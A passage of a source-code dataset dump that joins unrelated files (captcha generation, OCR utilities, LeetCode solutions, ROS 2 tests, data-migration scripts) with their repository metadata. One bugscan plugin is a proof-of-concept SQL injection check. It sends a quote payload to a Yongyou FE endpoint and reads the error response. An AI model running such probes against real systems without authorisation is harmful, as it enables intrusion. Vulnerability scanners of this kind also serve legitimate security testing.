Returns: highest sum index (int)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
# subtitle = "Mr. and M4rs. Dursley of nu28mber four, Privet Drive, wer903e proud to say th6at they we6re perfectly norm3al, tha894nk you ve89ry much."
# print(movieNight(subtitle))
# sentence = " abc def ghi jkl mno "
# print(longestWord(sentence))
|
[
"sanjay.mamidipaka@gmail.com"
] |
sanjay.mamidipaka@gmail.com
|
6ffb5a7913c10d585f3deb2048cc818c0cfc1870
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/117c19ce-1596.py
|
c48b541558f6dace7b69689c04f13acc0ba485e2
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078
| 2019-01-18T09:42:47
| 2019-01-18T09:42:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
#coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
# FE5.5
# http://www.wooyun.org/bugs/wooyun-2010-086697
def assign(service, arg):
if service == "yongyou_fe":
return True, arg
def audit(arg):
url = arg + '/common/treeXml.jsp?type=sort&lx=3&code=1%27'
_, head, body, _, _ = curl.curl(url)
if body and body.find('bad SQL grammar [];') != -1:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_fe', 'http://www.example.com/')[1])
|
[
"yudekui@wsmtec.com"
] |
yudekui@wsmtec.com
|
ed530119e7417142f6eadadd59dea9e964ffb5dd
|
535f6b7a0635233dead58a4d8ef203b32c43ff2a
|
/实验/AI2019_SA19225404_吴语港_Lab4_TF1.x/量化个人教学/假量化/generate.py
|
0d79b3a5b26dbcb9fe2aa08daee608ec403dafc4
|
[] |
no_license
|
jessenmeng/USTC_SSE_AI
|
6cff7c6a1671a4e503727eea4ef9b455d41b166d
|
fa7891d69edfa719b509d1af894f7b6aa23e0b7e
|
refs/heads/master
| 2022-12-25T19:32:39.320723
| 2020-10-10T06:08:19
| 2020-10-10T06:08:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,053
|
py
|
from captcha.image import ImageCaptcha # pip install captcha
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import random
import cv2
#生成字符对应的验证码
class generateCaptcha():
alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
def random_captcha_text(self,char_set=alphabet, captcha_size=4):
captcha_text = []
for i in range(captcha_size):
c = random.choice(char_set)
captcha_text.append(c)
return captcha_text
def gen_captcha_text_and_image(self):
image = ImageCaptcha(width = 160,height = 60)
captcha_text = self.random_captcha_text()
captcha_text = ''.join(captcha_text) #连接字符串
captcha = image.generate(captcha_text)
captcha_image = Image.open(captcha)
captcha_image = np.array(captcha_image)
return captcha_text, captcha_image
def vec2text(self,char_pos):
text = []
for i, c in enumerate(char_pos):
char_idx = c % 52
if char_idx < 26:
char_code = char_idx + ord('A')
elif char_idx < 52:
char_code = char_idx - 26 + ord('a')
text.append(chr(char_code))
return "".join(text)
def text2vec(self,text):
vector = np.zeros(4 * 52)
def char2pos(c):
k = ord(c) - 65
if k > 25:
k = ord(c) - 71
return k
for i, c in enumerate(text):
idx = i * 52 + char2pos(c)
vector[idx] = 1
return vector
def get_imgs(self,num):
#获取图片
train_imgs = np.zeros(num*160*60).reshape(num,160*60)
test_labels = np.zeros(num*52*4).reshape(num,52*4)
for i in range(num):
text, image = self.gen_captcha_text_and_image()
train_imgs[i,:] = np.mean(image,-1).flatten()/255
test_labels[i,:] = self.text2vec(text)
return train_imgs, test_labels
|
[
"321699849@qq.com"
] |
321699849@qq.com
|
56f4aa1fac68ae607b647d5e6fbc8b7e2273b221
|
393a393bb593ec5813aa16a96384a62128eed643
|
/ocr/src/processor/utility/common.py
|
a2e4d435f20872df95db8efa7de86379206bf01a
|
[] |
no_license
|
normanyahq/kejinyan
|
4b0d40559b0f6b715107aa38fe800539ba485f27
|
486403fcf393077fefb441cb64c217a2289aaf3e
|
refs/heads/master
| 2023-06-24T13:43:52.740419
| 2017-10-09T04:29:50
| 2017-10-09T04:29:50
| 84,788,246
| 7
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
import random
import datetime
import string
import time
def getSquareDist(p1, p2):
return (int(p1[0])-int(p2[0])) ** 2 + (int(p1[1])-int(p2[1]))**2
def generateFileName():
return getToken() + ".png"
def getToken():
return datetime.datetime.now().strftime("%Y%m%d%H%M%S") \
+ "".join([random.choice(string.uppercase + string.lowercase + string.digits)
for i in range(0, 10)])
def timeit(f):
def timed(*args, **kw):
ts = time.time()
result = f(*args, **kw)
te = time.time()
print 'func:%r took: %2.4f sec' % \
(f.__name__, te-ts)
return result
return timed
|
[
"normanyahq@gmail.com"
] |
normanyahq@gmail.com
|
eb3fc4058efee853d8bc2aa246422e6bdbc51da6
|
d2b81eacad849b66066b3b5d244b59f0144e8a0e
|
/python_do_sth/cv_3.py
|
aeda29e7cdd4d57cd02874d675fcffcae122bafc
|
[] |
no_license
|
Kaiping23/Automatic_operation_and_maintenance
|
ba88d7c2590fb6a23c20167d7273e06b037dfc52
|
4a659c91c44a0ef7c4701199f1ee49072bad98dd
|
refs/heads/master
| 2021-07-13T23:28:20.890603
| 2020-12-01T07:23:47
| 2020-12-01T07:23:47
| 222,401,688
| 0
| 2
| null | 2020-09-14T03:18:31
| 2019-11-18T08:42:26
|
Shell
|
UTF-8
|
Python
| false
| false
| 860
|
py
|
#!/usr/bin/python3
# _*_coding=utf-8 _*_
# @author lkp
# @date 2020/3/31 17:50
from PIL import Image, ImageDraw, ImageFont
import cv2
import os
def draw(pic):
img = cv2.imread('pic/' + pic)
img = img[:, :, (2, 1, 0)]
blank = Image.new("RGB", [len(img[0]), len(img), "white"])
drawObj = ImageDraw.Draw(blank)
n = 10
font = ImageFont.truetype('C:\Windows\Fonts\Microsoft YaHer UI/msgothic.ttc', size=n - 1)
for i in range(0, len(img), n):
for j in range(0, len(img[i], n)):
text = '武汉加油'
drawObj.ink = img[i][j][0] + img[i][j][1] * 256 + img[i][j][2] * 256 * 256
drawObj.text([j, i], text[int(j / n) % len(text)], font=font)
print('完成处理-----', i, j)
blank.save('new/new_' + pic, 'jpeg')
filelist = os.listdir('pic')
for file in filelist:
draw(file)
|
[
"admin@example.com"
] |
admin@example.com
|
1b73266fec9ad8adc485a161f7ef19f92c9e3161
|
536bce6ca78a9a151247b51acb8c375c9db7445f
|
/chapter2/2.33-fact.py
|
f39322d3d7ba4b95c64460e082de81bd82d43e19
|
[] |
no_license
|
clicianaldoni/aprimeronpython
|
57de34313f4fd2a0c69637fefd60b0fb5861f859
|
a917b62bec669765a238c4b310cc52b79c7df0c9
|
refs/heads/master
| 2023-01-28T18:02:31.175511
| 2023-01-23T08:14:57
| 2023-01-23T08:14:57
| 112,872,454
| 0
| 0
| null | 2017-12-02T19:55:40
| 2017-12-02T19:55:40
| null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
"""
Implement the factorial function
"""
def fact(n):
if n == 1 or n == 0:
return n
sum = 1
while n > 1:
sum *= n
n -= 1
return sum
print fact(4)
|
[
"martin@rodvand.net"
] |
martin@rodvand.net
|
f5beb8c7f2fe29d2b3875d2c777fa120da672849
|
3af6960c805e9903eb27c09d8bc7ebc77f5928fe
|
/problems/0095_Unique_Binary_Search_Trees_II/__init__.py
|
9d3b0685feaf5e1088c97cabc9af771655025d5e
|
[] |
no_license
|
romain-li/leetcode
|
b3c8d9d4473eebd039af16ad2d4d99abc2768bdd
|
5e82b69bd041c2c168d75cb9179a8cbd7bf0173e
|
refs/heads/master
| 2020-06-04T20:05:03.592558
| 2015-06-08T18:05:03
| 2015-06-08T18:05:03
| 27,431,664
| 2
| 1
| null | 2015-06-08T18:05:04
| 2014-12-02T12:31:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,040
|
py
|
ID = '95'
TITLE = 'Unique Binary Search Trees II'
DIFFICULTY = 'Medium'
URL = 'https://oj.leetcode.com/problems/unique-binary-search-trees-ii/'
BOOK = False
PROBLEM = r"""Given _n_, generate all structurally unique **BST's** (binary search trees)
that store values 1..._n_.
For example,
Given _n_ = 3, your program should return all 5 unique BST's shown below.
1 3 3 2 1
\ / / / \ \
3 2 1 1 3 2
/ / \ \
2 1 2 3
confused what `"{1,#,2,3}"` means? > read more on how binary tree is
serialized on OJ.
**OJ's Binary Tree Serialization:**
The serialization of a binary tree follows a level order traversal, where '#'
signifies a path terminator where no node exists below.
Here's an example:
1
/ \
2 3
/
4
\
5
The above binary tree is serialized as `"{1,2,3,#,#,4,#,#,5}"`.
"""
|
[
"romain_li@163.com"
] |
romain_li@163.com
|
b0b3f0dbcdb5f3398cb9d799cf00fb967cd0f87f
|
466912406272829982f75854cf0104c6ce8c9814
|
/data/spider2/migrate/domain_2_beian.py
|
85b21c4c99d1c2c7c4d92cd71141911c01a78701
|
[] |
no_license
|
logonmy/Codes
|
9631fa103fc499663361fa7eeccd7cedb9bb08e4
|
92723efdeccfc193f9ee5d0ab77203c254f34bc2
|
refs/heads/master
| 2021-09-21T18:07:22.985184
| 2018-08-30T05:53:26
| 2018-08-30T05:53:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,596
|
py
|
# -*- coding: utf-8 -*-
import os, sys
from pymongo import MongoClient
import pymongo
reload(sys)
sys.setdefaultencoding("utf-8")
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../util'))
import loghelper, config
import db
import name_helper
#logger
loghelper.init_logger("domain_2_beian", stream=True)
logger = loghelper.get_logger("domain_2_beian")
#mongo
mongo = db.connect_mongo()
collection = mongo.info.beian
if __name__ == '__main__':
logger.info("Begin...")
conn = db.connect_torndb()
domains = conn.query("select * from domain")
for domain in domains:
if domain["beianhao"] is None:
continue
logger.info(domain["domain"])
domain.pop("id")
domain.pop("companyId")
domain.pop("createUser")
domain.pop("modifyUser")
domain.pop("confidence")
domain.pop("verify")
domain.pop("active")
beian = collection.find_one({"domain":domain["domain"],"organizer":domain["organizer"]})
if beian is None:
collection.insert(domain)
#break
domains = conn.query("select * from source_domain")
for domain in domains:
if domain["beianhao"] is None:
continue
logger.info(domain["domain"])
domain.pop("id")
domain.pop("sourceCompanyId")
domain.pop("verify")
beian = collection.find_one({"domain":domain["domain"],"organizer":domain["organizer"]})
if beian is None:
collection.insert(domain)
#break
conn.close()
logger.info("End.")
|
[
"hush_guo@163.com"
] |
hush_guo@163.com
|
274d97a41930b485884225a410ffc761c904177b
|
254ef44b90485767a3aea8cbe77dc6bf77dddaeb
|
/605种花问题.py
|
d57acf9ac517c69f15cf6872c969cf4d6f949943
|
[] |
no_license
|
XinZhaoFu/leetcode_moyu
|
fae00d52a52c090901021717df87b78d78192bdb
|
e80489923c60ed716d54c1bdeaaf52133d4e1209
|
refs/heads/main
| 2023-06-19T02:50:05.256149
| 2021-07-09T00:50:41
| 2021-07-09T00:50:41
| 331,243,022
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 996
|
py
|
"""
假设有一个很长的花坛,一部分地块种植了花,另一部分却没有。可是,花不能种植在相邻的地块上,它们会争夺水源,两者都会死去。
给你一个整数数组 flowerbed 表示花坛,由若干 0 和 1 组成,其中 0 表示没种植花,1 表示种植了花。另有一个数 n ,能否在不打破种植规则的情况下种入 n 朵花?能则返回 true ,不能则返回 false。
示例 1:
输入:flowerbed = [1,0,0,0,1], n = 1
输出:true
"""
class Solution(object):
def canPlaceFlowers(self, flowerbed, n):
"""
:type flowerbed: List[int]
:type n: int
:rtype: bool
"""
res = 0
flowerbed.append(0)
flowerbed.insert(0, 0)
for index in range(1, len(flowerbed)-1):
if flowerbed[index-1] == 0 and flowerbed[index] == 0 and flowerbed[index+1] == 0:
flowerbed[index] = 1
res += 1
return res >= n
|
[
"948244817@qq.com"
] |
948244817@qq.com
|
1bc65433c162da913b092d7c9fdf5baab419a75a
|
8853462a79608b7e5b7af94dbfa6c0a63c1f6b6a
|
/2. Crawlers/CASNET_policy/Generated_data/temp.py
|
f77dd43e3977f455dd80c26bb735b579e07b95d0
|
[] |
no_license
|
Ashish017/CASNET
|
eaae2552f8d56413f756c7d3839cd6f548a6e1ef
|
73ec542c4c3fa1f97686796f0c385c71cad3e8d5
|
refs/heads/master
| 2023-02-06T06:53:27.362356
| 2020-12-27T04:43:34
| 2020-12-27T04:43:34
| 270,657,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
t1 = pd.read_csv("test_1.csv")
t2 = pd.read_csv("test_2.csv")
t3 = pd.read_csv("test_3.csv")
files = [t1,t2,t3]
di = {}
for i, file in enumerate(files):
for col in file.columns:
if col[0] != "U":
name = col + "_seed_{}".format(i+1)
di[name] = file[col]
frame = pd.DataFrame(di)
frame.to_csv("Crawler_CASNET_test.csv")
|
[
"ashishmalik7017@gmail.com"
] |
ashishmalik7017@gmail.com
|
383d7a4ec52c2853b77bfe31e940ffda2d8eb356
|
82b50cebff69927d4394378522ae96524950fff4
|
/pointnet_ops/python/ops/interpolate_ops_test.py
|
f6a478248088b8f9c2a5e4775093df4d606239aa
|
[
"MIT"
] |
permissive
|
jackd/pointnet_ops
|
1b8a44bccbb2d9d3d5763b725f8972ad096a8a14
|
26d9b85ce4b503fac7547b965e233442aa243430
|
refs/heads/master
| 2020-04-29T01:35:10.644187
| 2019-11-07T00:08:01
| 2019-11-07T00:08:01
| 175,735,495
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,836
|
py
|
# Copyright 2018 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for interpolate ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from interpolate_ops import three_interpolate
from interpolate_ops import three_nn
import tensorflow as tf
class GroupPointTest(tf.test.TestCase):
def test_grad(self):
with self.test_session():
points = tf.constant(np.random.random((1, 8, 16)).astype('float32'))
# print points
xyz1 = tf.constant(np.random.random((1, 128, 3)).astype('float32'))
xyz2 = tf.constant(np.random.random((1, 8, 3)).astype('float32'))
dist, idx = three_nn(xyz1, xyz2)
weight = tf.ones_like(dist) / 3.0
interpolated_points = three_interpolate(points, idx, weight)
# print interpolated_points
err = tf.test.compute_gradient_error(points, (1, 8, 16),
interpolated_points,
(1, 128, 16))
# print err
self.assertLess(err, 1e-4)
if __name__ == '__main__':
tf.test.main()
|
[
"thedomjack@gmail.com"
] |
thedomjack@gmail.com
|
7fd7d2d3435692240151409412192953b899d325
|
2ff7e53d5e512cd762217ca54317982e07a2bb0c
|
/cherrypy/test/test_wsgi_vhost.py
|
a7cbc1e110cbfd03a130821cba176cd2cc2bc53c
|
[] |
no_license
|
nanxijw/Clara-Pretty-One-Dick
|
66d3d69426642b79e8fd4cc8e0bec23adeeca6d6
|
50de3488a2140343c364efc2615cf6e67f152be0
|
refs/heads/master
| 2021-01-19T09:25:07.555284
| 2015-02-17T21:49:33
| 2015-02-17T21:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,102
|
py
|
#Embedded file name: cherrypy/test\test_wsgi_vhost.py
import cherrypy
from cherrypy.test import helper
class WSGI_VirtualHost_Test(helper.CPWebCase):
def setup_server():
class ClassOfRoot(object):
def __init__(self, name):
self.name = name
def index(self):
return 'Welcome to the %s website!' % self.name
index.exposed = True
default = cherrypy.Application(None)
domains = {}
for year in range(1997, 2008):
app = cherrypy.Application(ClassOfRoot('Class of %s' % year))
domains['www.classof%s.example' % year] = app
cherrypy.tree.graft(cherrypy._cpwsgi.VirtualHost(default, domains))
setup_server = staticmethod(setup_server)
def test_welcome(self):
if not cherrypy.server.using_wsgi:
return self.skip('skipped (not using WSGI)... ')
for year in range(1997, 2008):
self.getPage('/', headers=[('Host', 'www.classof%s.example' % year)])
self.assertBody('Welcome to the Class of %s website!' % year)
|
[
"billchang.e@gmail.com"
] |
billchang.e@gmail.com
|
891131987930169977089ef3876a01ab735f4942
|
a3e34daf7cf75f98d54b7d183f68e50277a6479b
|
/sources/XML projects/IBN EZRA/parse.py
|
71b51b7d8f32ca018977270a23b497b3c19866af
|
[] |
no_license
|
TomaszWaszczyk/Sefaria-Data
|
2d0f1544c071340bffd87585e6883ef77df41495
|
db2e136a14c6d08d98925da3afdf6373fec92de1
|
refs/heads/master
| 2023-06-07T07:56:24.332834
| 2021-06-20T15:53:56
| 2021-06-20T15:53:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,952
|
py
|
# -*- coding: utf-8 -*-
__author__ = 'stevenkaplan'
from sources.functions import *
from sefaria.model import *
from data_utilities.XML_to_JaggedArray import XML_to_JaggedArray
from sefaria.helper.schema import *
import bleach
SERVER = "https://ste.cauldron.sefaria.org"
def reorder_modify(text):
return bleach.clean(text, strip=True)
def get_dict_of_names(file):
import csv
reader = csv.reader(open(file))
dict = {}
for row in reader:
dict[row[0]] = row[1]
return dict
def change_priority(dict_of_names):
pass
def tester(x):
return x.tag == "h1"
if __name__ == "__main__":
#add_term("Preface", u"פתח דבר", "pseudo_toc_categories", "http://localhost:8000")
#create_schema("Responsa to Chaplains", u"משהו", ["Halakhah"])
post_info = {}
volume = 2
post_info["language"] = "en"
post_info["server"] = SERVER
allowed_tags = ["volume", "book", "ack", "intro", "preface", "bibl", "part", "chapter", "p", "ftnote", "title", "ol", "footnotes", "appendix"]
allowed_attributes = ["id"]
p = re.compile("\d+a?\.")
post_info["versionTitle"] = "Ibn Ezra's commentary on the Pentateuch, tran. and annot. by H. Norman Strickman and Arthur M. Silver. Menorah Pub., 1988-2004"
post_info["versionSource"] = "https://www.nli.org.il/he/books/NNL_ALEPH001102376/NLI"
title = "Ibn Ezra"
for file in os.listdir("."):
print(file)
if file.endswith("xml") and "IBN" in file:
with open(file) as f:
contents = f.read()
title = "Ibn Ezra on {}".format(file.split("_")[-1].replace(".xml", ""))
parser = XML_to_JaggedArray(title, contents, allowed_tags, allowed_attributes, post_info, change_name=True, image_dir="./images",
titled=True, print_bool=True)
parser.set_funcs(reorder_modify=reorder_modify, reorder_test=tester)
parser.run()
|
[
"steve@sefaria.org"
] |
steve@sefaria.org
|
fbe5b3bc53d4ca5e5279b5e32b1207f84aea771a
|
00c6ded41b84008489a126a36657a8dc773626a5
|
/.history/Sizing_Method/ConstrainsAnalysis/DesignPointSelectStrategy_20210714191430.py
|
04f5745a8803874ada846022a476fba426fada70
|
[] |
no_license
|
12libao/DEA
|
85f5f4274edf72c7f030a356bae9c499e3afc2ed
|
1c6f8109bbc18c4451a50eacad9b4dedd29682bd
|
refs/heads/master
| 2023-06-17T02:10:40.184423
| 2021-07-16T19:05:18
| 2021-07-16T19:05:18
| 346,111,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,729
|
py
|
# author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysisPD as ca_pd
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysisPDP1P2 as ca_pd_12
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class Design_Point_Select_Strategy:
"""This is a design point select strategy from constrains analysis"""
def __init__(self, altitude, velocity, beta, method, p_turbofan_max, p_motorfun_max, n=12):
"""
:param altitude: m x 1 matrix
:param velocity: m x 1 matrix
:param beta: P_motor/P_total m x 1 matrix
:param p_turbofan_max: maximum propulsion power for turbofan (threshold value)
:param p_motorfun_max: maximum propulsion power for motorfun (threshold value)
:param n: number of motor
the first group of condition is for stall speed
the stall speed condition have to use motor, therefore with PD
:return:
power load: design point p/w and w/s
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.n_motor = n
self.p_turbofan_max = p_turbofan_max
self.p_motorfun_max = p_motorfun_max
# initialize the p_w, w_s, hp, n, m
self.n = 100
self.m = len(self.h)
self.hp = np.linspace(0, 1, self.n)
self.hp_threshold = self.p_motorfun_max / (self.p_motorfun_max + self.p_turbofan_max)
# method1 = Mattingly_Method, method2 = Gudmundsson_Method
if method == 1:
self.method1 = ca_pd_12.ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun
self.method2 = ca_pd_12.ConstrainsAnalysis_Mattingly_Method_with_DP_electric
else:
self.method1 = ca_pd_12.ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun
self.method2 = ca_pd_12.ConstrainsAnalysis_Gudmundsson_Method_with_DP_electric
problem = self.method(self.h[0], self.v[0], self.beta[0], 6000, self.hp_threshold)
self.w_s = problem.allFuncs[0](problem)
def p_w_compute(self):
p_w = np.zeros([self.m, self.n]) # m x n matrix
for i in range(1, 8):
for j in range(self.n):
problem1 = self.method1(self.h[i], self.v[i],
self.beta[i], self.w_s, self.hp[j])
problem2 = self.method2(self.h[i], self.v[i],
self.beta[i], self.w_s, self.hp[j])
if i >= 5:
p_w_1 = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w_2 = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w_1 = problem1.allFuncs[i](problem1)
p_w_2 = problem2.allFuncs[i](problem2)
if p_w_1 > self.p_turbofan_max:
p_w_1 = 100000
elif p_w_2 > self.p_motorfun_max:
p_w_2 = 100000
self.p_w[i, j] = p_w_1 + p_w_2
return p_w
def strategy(self):
p_w = Design_Point_Select_Strategy.p_w_compute(self)
#find the min p_w for difference hp for each flight condition:
p_w_min = np.amax(p_w, axis=1)
hp_p_w_min = np.array(np.where(p_w == p_w_min))
design_p
|
[
"libao@gatech.edu"
] |
libao@gatech.edu
|
a65e513b2a58d300144f7c80b24d882cad985edc
|
a0ca6e78f0500e6bfc874cdb4ad79869c0fc4e81
|
/plot_admitted.py
|
027c0de8432efea3e6c2e5c09fc897a98567b1f0
|
[] |
no_license
|
kshedden/micovid
|
e25fc834e4fe9f55fdd80a40d68c134a9912bc3c
|
1f85d84645707d4bb5e6bc913e667d666ce10a85
|
refs/heads/master
| 2022-11-23T23:46:09.794802
| 2020-07-20T02:57:57
| 2020-07-20T02:57:57
| 275,910,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,281
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.dates as mdates
import json
import gzip
months = mdates.MonthLocator()
months_fmt = mdates.DateFormatter("%b")
with gzip.open("/nfs/kshedden/Daniel_Keyes/ratio_results.json.gz") as gid:
dm = json.load(gid)
pdf = PdfPages("admit_ratios.pdf")
px = []
for ky in dm.keys():
px.append(":".join(ky.split(":")[0:-1]))
px = list(set(px))
px.sort()
for kp in px:
plt.clf()
plt.figure(figsize=(7, 5))
plt.axes([0.1, 0.11, 0.8, 0.8])
plt.grid(True)
try:
dun = dm[kp + ":Admit"]
dud = dm[kp + ":Total"]
except KeyError:
continue
dun = np.asarray(dun).T
dud = np.asarray(dud).T
dd = pd.to_datetime("2020-01-01") + pd.to_timedelta(dun[:, 0], 'd')
xt = ky.split(":")[-1]
plt.plot(dd, np.exp(dun[:, 1] - dud[:, 1]), label=xt, color='black', alpha=0.6)
plt.gca().xaxis.set_major_locator(months)
plt.gca().xaxis.set_major_formatter(months_fmt)
plt.xlabel("Date (2020)", size=14)
plt.ylabel("Ratio relative to 2019", size=14)
plt.ylim(ymin=0)
ti = kp.split(":")
ti[1] = ti[1].lower()
plt.title(" ".join(ti) + "s")
pdf.savefig()
pdf.close()
|
[
"kshedden@umich.edu"
] |
kshedden@umich.edu
|
d1de944f71e0ff37476071f7eb2400ef4bf5ca6e
|
d4e9fd6dd51d29ad374b460a2cfbd467502ede7d
|
/ros2doctor/test/test_qos_compatibility.py
|
cb21bedba5e8d26abe78afc768015c3139e5efed
|
[
"Apache-2.0"
] |
permissive
|
ros2/ros2cli
|
3f7b93ff44d18b2292a50d3b6ff119494142328b
|
351ef3c7442f49013d84084dea23fe399517690f
|
refs/heads/rolling
| 2023-08-07T03:53:23.635067
| 2023-08-03T19:50:28
| 2023-08-03T19:50:28
| 93,568,427
| 142
| 157
|
Apache-2.0
| 2023-09-14T07:36:46
| 2017-06-06T22:13:14
|
Python
|
UTF-8
|
Python
| false
| false
| 6,588
|
py
|
# Copyright 2021 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import os
import sys
import unittest
from launch import LaunchDescription
from launch.actions import ExecuteProcess
from launch_ros.actions import Node
import launch_testing
import launch_testing.actions
import launch_testing.asserts
import launch_testing.markers
import launch_testing.tools
import launch_testing_ros.tools
import pytest
from rclpy.utilities import get_available_rmw_implementations
# Skip cli tests on Windows while they exhibit pathological behavior
# https://github.com/ros2/build_farmer/issues/248
if sys.platform.startswith('win'):
pytest.skip(
'CLI tests can block for a pathological amount of time on Windows.',
allow_module_level=True)
@pytest.mark.rostest
@launch_testing.parametrize('rmw_implementation', get_available_rmw_implementations())
def generate_test_description(rmw_implementation):
path_to_fixtures = os.path.join(os.path.dirname(__file__), 'fixtures')
additional_env = {
'RMW_IMPLEMENTATION': rmw_implementation, 'PYTHONUNBUFFERED': '1'
}
path_to_incompatible_talker_node_script = os.path.join(
path_to_fixtures, 'talker_node_with_best_effort_qos.py')
path_to_compatible_talker_node_script = os.path.join(
path_to_fixtures, 'talker_node_with_reliable_qos.py')
path_to_listener_node_script = os.path.join(
path_to_fixtures, 'listener_node_with_reliable_qos.py')
talker_node_compatible = Node(
executable=sys.executable,
arguments=[path_to_compatible_talker_node_script],
remappings=[('chatter', 'compatible_chatter')],
additional_env=additional_env
)
listener_node_compatible = Node(
executable=sys.executable,
arguments=[path_to_listener_node_script],
remappings=[('chatter', 'compatible_chatter')],
additional_env=additional_env
)
talker_node_incompatible = Node(
executable=sys.executable,
arguments=[path_to_incompatible_talker_node_script],
remappings=[('chatter', 'incompatible_chatter')],
additional_env=additional_env
)
listener_node_incompatible = Node(
executable=sys.executable,
arguments=[path_to_listener_node_script],
remappings=[('chatter', 'incompatible_chatter')],
additional_env=additional_env
)
return LaunchDescription([
# Always restart daemon to isolate tests.
ExecuteProcess(
cmd=['ros2', 'daemon', 'stop'],
name='daemon-stop',
on_exit=[
ExecuteProcess(
cmd=['ros2', 'daemon', 'start'],
name='daemon-start',
on_exit=[
# Add incompatible talker/listener pair.
talker_node_incompatible,
listener_node_incompatible,
talker_node_compatible,
listener_node_compatible,
launch_testing.actions.ReadyToTest()
],
additional_env=additional_env
)
]
),
]), locals()
class TestROS2DoctorQoSCompatibility(unittest.TestCase):
@classmethod
def setUpClass(
cls,
launch_service,
proc_info,
proc_output,
rmw_implementation,
):
rmw_implementation_filter = launch_testing_ros.tools.basic_output_filter(
filtered_patterns=['WARNING: topic .* does not appear to be published yet'],
filtered_rmw_implementation=rmw_implementation
)
@contextlib.contextmanager
def launch_doctor_command(self, arguments):
doctor_command_action = ExecuteProcess(
cmd=['ros2', 'doctor', *arguments],
additional_env={
'RMW_IMPLEMENTATION': rmw_implementation,
'PYTHONUNBUFFERED': '1'
},
name='ros2doctor-cli',
output='screen'
)
with launch_testing.tools.launch_process(
launch_service, doctor_command_action, proc_info, proc_output,
output_filter=rmw_implementation_filter
) as doctor_command:
yield doctor_command
cls.launch_doctor_command = launch_doctor_command
@launch_testing.markers.retry_on_failure(times=5, delay=1)
def test_check(self):
with self.launch_doctor_command(
arguments=[]
) as doctor_command:
assert doctor_command.wait_for_shutdown(timeout=10)
assert doctor_command.exit_code == launch_testing.asserts.EXIT_OK
assert doctor_command.output
lines_list = [line for line in doctor_command.output.splitlines() if line]
assert 'Failed modules' in lines_list[-1]
assert 'middleware' in lines_list[-1]
@launch_testing.markers.retry_on_failure(times=5, delay=1)
def test_report(self):
for argument in ['-r', '--report']:
with self.launch_doctor_command(
arguments=[argument]
) as doctor_command:
assert doctor_command.wait_for_shutdown(timeout=10)
assert doctor_command.exit_code == launch_testing.asserts.EXIT_OK
assert ('topic [type] : /compatible_chatter [std_msgs/msg/String]\n'
'publisher node : talker_node\n'
'subscriber node : listener\n'
'compatibility status : OK') in doctor_command.output
assert ('topic [type] : /incompatible_chatter [std_msgs/msg/String]\n'
'publisher node : talker_node\n'
'subscriber node : listener\n'
'compatibility status : '
'ERROR: Best effort publisher and reliable subscription;') \
in doctor_command.output
|
[
"noreply@github.com"
] |
ros2.noreply@github.com
|
5c8bec34b3455da38460275936f45236a1356b09
|
921aa4d0dddc868b61fe1ea3805cf15c36853bc0
|
/client/k8s_client/models/v1beta1_ingress_list.py
|
